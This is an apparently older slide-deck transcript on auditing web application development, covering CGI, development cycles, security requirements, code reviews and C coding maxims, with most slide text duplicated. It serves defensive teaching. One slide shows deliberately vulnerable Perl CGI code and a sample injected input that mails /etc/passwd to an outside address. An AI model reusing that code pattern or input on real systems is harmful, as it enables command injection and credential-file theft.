auditing the development of web-based applications jian zhen
TRANSCRIPT
Auditing the Development Auditing the Development of Web-Based Applicationsof Web-Based Applications
Jian ZhenJian Zhen
OverviewOverview
Overview of WWW and HTTPOverview of WWW and HTTP Web-based Application ConceptsWeb-based Application Concepts Overview of the Development Overview of the Development
CyclesCycles Security RequirementsSecurity Requirements Web-based Application SecurityWeb-based Application Security Application Code ReviewsApplication Code Reviews
World-Wide-Web (WWW)World-Wide-Web (WWW)
Invented by Tim Berners-Lee and others at the European Laboratory for Particle Physics (CERN)
Based on hypertext--a system of embedding links in text to link to other text
The most popular way of linking to resources on the Internet
WWW (Cont.)WWW (Cont.)
Hundres of millions of pages indexed by search engines
Tens of terabytes archived by Alexa
Hundreds of millions users on the Web
WWW and HTTPWWW and HTTP
Static Web ModelStatic Web Model
Web Browser Web Server
Request at port 80Response and close
2nd request2nd response & close
Common Gateway Common Gateway Interface (CGI)Interface (CGI)
CommonCommon• An open specificationAn open specification• Many languagesMany languages
GatewayGateway• Strength is not in what is does by itselfStrength is not in what is does by itself• Methods to access other systemsMethods to access other systems
InterfaceInterface• Well defined way to call featuresWell defined way to call features
CGI (cont.)CGI (cont.)
A way of providing dynamic web A way of providing dynamic web contentcontent• FormsForms• CountersCounters• Guest BooksGuest Books• Database QueriesDatabase Queries
Used by most of the web-based Used by most of the web-based applicationsapplications
The CGI ModelThe CGI Model
B row ser D esktop W eb S erver
In terne t
C G IP rocesson the
W ebS erver
23
1. H TTP R equest2. C G I S tarted, Input passed to C G I process3. C G I hands back output4. O utput R eturns to the browser
1
4
Web ApplicationsWeb Applications
Browsers:• Plug-ins• Applets• DHTML• etc
Internet
Server:• CGI• Servlets• ASP• NSAPI
CORBA/ODBC
Static PagesDatabase
Web ApplicationsWeb Applications
Client sideClient side• HTML/DHTMLHTML/DHTML• JavaScript, VBScript, PerlScriptJavaScript, VBScript, PerlScript• JavaJava• ActiveXActiveX• Plug-insPlug-ins
Web ApplicationsWeb Applications
Server sideServer side• Frontend: CGIs (Perl, C/C++), Java Frontend: CGIs (Perl, C/C++), Java
Servlets, ISAPI, NSAPI, ASP, etcServlets, ISAPI, NSAPI, ASP, etc• Middleware: CORBA, ODBC, DCOM, Middleware: CORBA, ODBC, DCOM,
etcetc• Backend: Oracle, Informix, Sybase, Backend: Oracle, Informix, Sybase,
DB2, etcDB2, etc
Web ApplicationsWeb Applications
Complex distributed, Client/Server Complex distributed, Client/Server applicationsapplications
Many elements involved and Many elements involved and integratedintegrated
Rapid developmentRapid development Requires more planning, design, Requires more planning, design,
and control than “conventional” and control than “conventional” projects.projects.
Web Development CyclesWeb Development Cycles
Analysis Design
TestingImplementation
Prototyping
Web Development CyclesWeb Development Cycles
AnalysisAnalysis• Feasibility studyFeasibility study• Identify requirementsIdentify requirements• Involvment: your requirementsInvolvment: your requirements
Web Development CyclesWeb Development Cycles
DesignDesign• Design specificationsDesign specifications• Involvment: system interoperability, Involvment: system interoperability,
resiliency, capacity planning, mature resiliency, capacity planning, mature technologies, security designtechnologies, security design
Design SpecificationDesign Specification
Business Business RequirementRequirement
Existing and Existing and Proposed System Proposed System OverviewOverview
Hardware and Hardware and Software Software RequirementsRequirements
System SchematicSystem Schematic
System System InteroperabilityInteroperability
Operational Operational cycle/Workflow cycle/Workflow System ModulesSystem Modules
Input-OutputInput-Output User Interface User Interface
PrototypesPrototypes
Web Development CyclesWeb Development Cycles
PrototypingPrototyping• Most time-consuming stageMost time-consuming stage• CodingCoding• Build, review, and refine prototypeBuild, review, and refine prototype• Involvement: coding standards, Involvement: coding standards,
effective application development effective application development environmentenvironment
Web Development CyclesWeb Development Cycles
TestingTesting• Unit/System test plansUnit/System test plans• Module/Unit testingModule/Unit testing• System integration testingSystem integration testing• Involvement: test plans, effective Involvement: test plans, effective
testing environment, testing stages, testing environment, testing stages, code reviewscode reviews
Web Development CyclesWeb Development Cycles
Delivery/ImplementationDelivery/Implementation• Install systemsInstall systems• Train usersTrain users• Acceptance testingAcceptance testing• Involvement: effective Involvement: effective
implementationimplementation
Security RequirementsSecurity Requirements
Privacy - All user information are Privacy - All user information are protectedprotected
Authentication/Access Control- Only Authentication/Access Control- Only authorized users are allowed to access authorized users are allowed to access the resourcesthe resources
Integrity - User and application data Integrity - User and application data cannot be tempered withcannot be tempered with
Auditing - Keeping audit logs and audit Auditing - Keeping audit logs and audit trails and ensuring their integritytrails and ensuring their integrity
PrivacyPrivacy
Protecting users’ private informationProtecting users’ private information• SSNSSN• BirthdatesBirthdates• Employee IdsEmployee Ids• PasswordsPasswords
TechnologiesTechnologies• Encryption: DES, RSA, SSLEncryption: DES, RSA, SSL• Local vs. NetworkLocal vs. Network
AuthenticationAuthentication
Proof of IdentityProof of Identity Required to enforce access control Required to enforce access control
and accountability, and achieve and accountability, and achieve non-repudiationnon-repudiation
TechnologiesTechnologies• username/passwordusername/password• Smart Cards, SecurIDSmart Cards, SecurID• BiometricsBiometrics
Access ControlAccess Control
Determine who is authorized to Determine who is authorized to receive or modify informationreceive or modify information
Common mechanismsCommon mechanisms• Mandatory Access Control (MAC)Mandatory Access Control (MAC)
– Owners cannot modify access list (SeOS)Owners cannot modify access list (SeOS)
• Discretionary Access Control (DAC)Discretionary Access Control (DAC)– Owners are allowed to modify access (UNIX)Owners are allowed to modify access (UNIX)
• Role-based Access Control (RBAC)Role-based Access Control (RBAC)– Role granted provides necessary accessRole granted provides necessary access
AuditingAuditing
The process of collecting and The process of collecting and recording security-relevant recording security-relevant activities on a systemactivities on a system
After-the-fact techniqueAfter-the-fact technique Audit logs are used as evidenceAudit logs are used as evidence
Data EncryptionData Encryption
ConfidentialityConfidentiality• Scrambling data to unreadable formatScrambling data to unreadable format
IntegrityIntegrity• User and application data are not modifiedUser and application data are not modified
TechnologiesTechnologies• Public/Secret Key Encryption: RSA, DESPublic/Secret Key Encryption: RSA, DES• Digital Signatures: DSSDigital Signatures: DSS• Hashes: MD5Hashes: MD5
Web-based Application Web-based Application SecuritySecurity
Security flaws occur when software Security flaws occur when software bugs allow violation of security policybugs allow violation of security policy
Different security flaw present Different security flaw present different threatsdifferent threats• Opening backdoorsOpening backdoors• Stealing information or system resourceStealing information or system resource• Destroying or tempering dataDestroying or tempering data
Where Do Flaws Exist?Where Do Flaws Exist?
Operating SystemsOperating Systems• UNIX, NTUNIX, NT
Support Software and LibrariesSupport Software and Libraries• Compilers, C LibrariesCompilers, C Libraries
ApplicationsApplications• CGI programs, Netscape, Internet CGI programs, Netscape, Internet
Explorer, vi, Emacs, Sendmail, many Explorer, vi, Emacs, Sendmail, many othersothers
Web-based Application Web-based Application SecuritySecurity
Different layers of securityDifferent layers of security• Network securityNetwork security• Operating System securityOperating System security• Web server securityWeb server security• Application securityApplication security
MUST PROTECT ALL LAYERS!!!MUST PROTECT ALL LAYERS!!!• Rootshell gets defaced!Rootshell gets defaced!
Web-based Application Web-based Application SecuritySecurity
Common Security Flaws Common Security Flaws • Insufficient Input ValidationsInsufficient Input Validations• Memory Cleansing, i.e. Cookie Memory Cleansing, i.e. Cookie
deletion on the clientdeletion on the client• Environmental FaultsEnvironmental Faults• Buffer OverflowsBuffer Overflows• Race ConditionsRace Conditions
Web-based Application Web-based Application SecuritySecurity
CGI Programming ExampleCGI Programming Example What if we used this Perl code to What if we used this Perl code to
send mail to an address given in a send mail to an address given in a fill-out form?fill-out form?
$mail_to= &get_name_from_input; #read the address$mail_to= &get_name_from_input; #read the address
open (MAIL, “| /usr/lib/sendmail $mail_to”);open (MAIL, “| /usr/lib/sendmail $mail_to”);
print MAIL “To: $mail_to\nFrom: me\n\nHello\n”;print MAIL “To: $mail_to\nFrom: me\n\nHello\n”;
close MAIL;close MAIL;
CGI Example (cont.)CGI Example (cont.)
Look at the open() callLook at the open() callopen (MAIL, “| /usr/lib/sendmail $mail_to”);open (MAIL, “| /usr/lib/sendmail $mail_to”);
What if the user enteredWhat if the user [email protected];mail [email protected];mail [email protected]</etc/passwd;[email protected]</etc/passwd;
Look at the open again!Look at the open again!/usr/lib/sendmail [email protected]; mail /usr/lib/sendmail [email protected]; mail [email protected]</etc/passwd;[email protected]</etc/passwd;
Web-based Application Web-based Application SecuritySecurity
Never Assume That:Never Assume That:• The input to a field from a selection list will The input to a field from a selection list will
be one of the items on the listbe one of the items on the list• A browser will never send more than the A browser will never send more than the
maximum length of an input fieldmaximum length of an input field• The field in the QUERY_STRING variable will The field in the QUERY_STRING variable will
match the ones on the pagematch the ones on the page• The QUERY_STRING variable will The QUERY_STRING variable will
correspond to something that is within correspond to something that is within valid HTTP specsvalid HTTP specs
Web-based Application Web-based Application SecuritySecurity
AVOID shell programming!AVOID shell programming! Always use full pathnames for both Always use full pathnames for both
commands and filenames, or commands and filenames, or explicitly set the PATH variableexplicitly set the PATH variable
Don’t depend on the current Don’t depend on the current directorydirectory
Use and check all return codes from Use and check all return codes from system callssystem calls
Web-based Application Web-based Application SecuritySecurity
Have internal consistency checking Have internal consistency checking codecode
Include lots of loggingInclude lots of logging Review publicly available programsReview publicly available programs Review error logsReview error logs Make the critical portion of the Make the critical portion of the
program as simple as possibleprogram as simple as possible Read through the codeRead through the code
Code ReviewsCode Reviews
Code InspectionCode Inspection• FormalFormal
Walk ThroughWalk Through Code ReadingCode Reading
• InformalInformal
Code ReviewsCode Reviews
Code InspectionCode Inspection• Formal code reviewFormal code review• Emphasize on defect detection, not Emphasize on defect detection, not
correctioncorrection• Reviewers prepare beforehandReviewers prepare beforehand• Distinct roles are assignedDistinct roles are assigned
Code ReviewsCode Reviews
WalkthroughsWalkthroughs• Usually hosted and moderated by the Usually hosted and moderated by the
author of the design or code under author of the design or code under reviewreview
• To improve the technical quality of a To improve the technical quality of a programprogram
• Emphasize on error detectionEmphasize on error detection
Code ReviewsCode Reviews
Code ReadingCode Reading• Read source code and look for errorsRead source code and look for errors• Comment on design, style, Comment on design, style,
readability, maintainability, and readability, maintainability, and efficiencyefficiency
• Informal meetingsInformal meetings• Probably most common in web-based Probably most common in web-based
application environmentapplication environment
AppendixAppendix
The Ten Commandments for C The Ten Commandments for C ProgrammersProgrammers
The Ten Commandments The Ten Commandments for C Programmersfor C Programmers
Thou shalt run Thou shalt run lintlint frequently and study its frequently and study its pronouncements with care, for verily its pronouncements with care, for verily its perception and judgement oft exceed perception and judgement oft exceed thine.thine.
Thou shalt not follow the NULL pointer, for Thou shalt not follow the NULL pointer, for chaos and madness await thee at its end.chaos and madness await thee at its end.
The Ten Commandments The Ten Commandments for C Programmers (cont.)for C Programmers (cont.)
Thou shalt cast all function arguments to the Thou shalt cast all function arguments to the expected type if they are not of that type expected type if they are not of that type already, een when thou are convinced that this already, een when thou are convinced that this is unnecessary, lest the take cruel vengeance is unnecessary, lest the take cruel vengeance upon thee when thou least expect it.upon thee when thou least expect it.
If thy header files fail to declare the return If thy header files fail to declare the return types of thy library functions, thou shalt types of thy library functions, thou shalt declare them thyself with the most meticulous declare them thyself with the most meticulous care, lest grievous harm befall thy program.care, lest grievous harm befall thy program.
The Ten Commandments The Ten Commandments for C Programmers (cont.)for C Programmers (cont.)
Thou shalt check the array bounds of all strings Thou shalt check the array bounds of all strings (indeed, all arrays,) for surely where thou typest (indeed, all arrays,) for surely where thou typest “foo” someone someday shall type “foo” someone someday shall type “supercalifragilisticexpialidocious.”“supercalifragilisticexpialidocious.”
If a function be advertised to return an error If a function be advertised to return an error code in the event of difficulties, thou shalt code in the event of difficulties, thou shalt check for that code, yea, even though the check for that code, yea, even though the checks triple the size of thy code and produce checks triple the size of thy code and produce aches in thy typing fingers, for if thou thinkest aches in thy typing fingers, for if thou thinkest “it cannot happen to me,” the gods shall surely “it cannot happen to me,” the gods shall surely punish thee for thy arrogance.punish thee for thy arrogance.
The Ten Commandments The Ten Commandments for C Programmers (cont.)for C Programmers (cont.)
Thou shalt study thy libraries and strive not Thou shalt study thy libraries and strive not to re-invent them without cause, that thy to re-invent them without cause, that thy code may be short and readable and thy code may be short and readable and thy days pleasant and productive.days pleasant and productive.
Thou shalt make thy program’s purpose and Thou shalt make thy program’s purpose and structure clear to thy fellow man by using structure clear to thy fellow man by using the One True Brace Style, even if thou likest the One True Brace Style, even if thou likest it not, for thy creativity is better used in it not, for thy creativity is better used in solving problems than in creating beautiful solving problems than in creating beautiful new impediments to understanding.new impediments to understanding.
The Ten Commandments The Ten Commandments for C Programmers (cont.)for C Programmers (cont.)
Thy external identifiers shall be unique in the first Thy external identifiers shall be unique in the first six characters, though this harsh discipline be six characters, though this harsh discipline be irksome and the years of its necessity stretch before irksome and the years of its necessity stretch before thee seemingly without end, lest thou tear thy hair thee seemingly without end, lest thou tear thy hair out and go mad on that fateful day when thou out and go mad on that fateful day when thou desirest to make thy program run on an old system.desirest to make thy program run on an old system.
Thou shalt foreswear, renounce, and abjure the vile Thou shalt foreswear, renounce, and abjure the vile heresy which claimeth that “All the world’s a VAX,” heresy which claimeth that “All the world’s a VAX,” and have no commerce with the benighted and have no commerce with the benighted heathens who cling to this barbarous belif, that the heathens who cling to this barbarous belif, that the days of thy program may be long even though the days of thy program may be long even though the days of thy current machine be short.days of thy current machine be short.